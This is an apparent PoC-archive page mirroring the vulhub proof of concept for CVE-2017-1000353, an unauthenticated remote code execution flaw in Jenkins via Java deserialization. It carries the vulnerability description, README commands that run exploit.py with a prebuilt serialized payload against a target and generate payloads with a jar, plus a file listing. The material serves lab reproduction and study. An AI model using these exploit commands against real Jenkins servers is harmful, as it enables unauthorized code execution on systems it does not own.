Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-1000353 PoC — CloudBees Jenkins 代码问题漏洞

Source
https://github.com/vulhub/CVE-2017-1000353
Associated Vulnerability
Title:CloudBees Jenkins 代码问题漏洞 (CVE-2017-1000353)
Description:Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.
Description
jenkins CVE-2017-1000353 POC
Readme
# CVE-2017-1000353 POC

How to reproduce the Jenkins CVE-2017-1000353?

Clone this repository, use the pre-built payload `jenkins_poc.ser` with flowing command:

```
python exploit.py http://your-ip:8080 jenkins_poc.ser
```

Then the `touch /tmp/success` would be executed.

How to generate the payload `jenkins_poc.ser`?

Download [CVE-2017-1000353-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar).

```
java -jar CVE-2017-1000353-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
```

Referer:

https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2017-1000353
File Snapshot

 [4.0K]  /data/pocs/ada29b9ee00ba3da741b59fa94f99a82a00fd0fc
├── [  80]  CVE20171000353.iml
├── [2.0K]  exploit.py
├── [2.4K]  jenkins_poc.ser
├── [2.7K]  pom.xml
├── [ 648]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            └── [4.0K]  org
                └── [4.0K]  vulhub
                    └── [5.8K]  Payload.java

5 directories, 6 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →